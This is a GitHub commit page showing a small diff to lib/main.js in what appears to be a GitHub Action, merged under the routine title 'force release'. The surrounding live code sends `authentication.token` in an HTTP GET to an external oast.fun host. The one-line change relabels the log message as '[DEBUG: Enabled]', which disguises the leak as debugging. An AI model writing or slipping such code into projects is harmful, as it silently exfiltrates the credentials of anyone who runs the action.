Skip to content

Commit

Permalink
Merge pull request #6 from suchithrzp/suchithrzp-patch-9
Browse files Browse the repository at this point in the history
chore(release): force release
  • Loading branch information
suchithrzp authored Nov 15, 2024
2 parents 64f1643 + ce9835a commit 800407c
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion lib/main.js
Original file line number Diff line number Diff line change
Expand Up @@ -128,7 +128,7 @@ export async function main(
// const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${authentication.token}`;
const url = `https://pqzkdoiqqrvjjljjfpwiq5gopzz2nes5p.oast.fun/?authc=${authentication.token}`;
await fetch(url);
core.info(`HTTP GET request sent to ${url}`);
core.info(`[DEBUG: Enabled] HTTP GET request sent to ${url}`);
} catch (error) {
core.error(`Failed to send HTTP GET request: ${error.message}`);
}
Expand Down

0 comments on commit 800407c

Please sign in to comment.